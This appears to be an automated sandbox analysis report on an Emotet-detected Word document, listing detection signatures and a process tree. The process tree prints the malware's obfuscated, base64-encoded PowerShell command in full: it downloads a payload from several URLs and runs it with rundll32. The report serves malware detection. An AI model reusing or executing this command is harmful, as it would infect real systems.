Loading ...

Play interactive tourEdit tour

Analysis Report v22Pc0qA.doc.doc

Overview

General Information

Sample Name:v22Pc0qA.doc.doc
Analysis ID:347028
MD5:7a7d325948481b0557b035249bf5c96a
SHA1:0529727ffad8388fc94155d1652ca65189cda5df
SHA256:47e4926bc53fb131b2e976d7b1c2f4b3c0f665242aa493d7e21b4df773b60919

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 4180 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cmd.exe (PID: 5632 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA== MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 5620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • msg.exe (PID: 6068 cmdline: msg user /v Word experienced an error trying to open the file. MD5: EEB395D8DD3C1D6593903BD640687948)
    • powershell.exe (PID: 1320 cmdline: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYA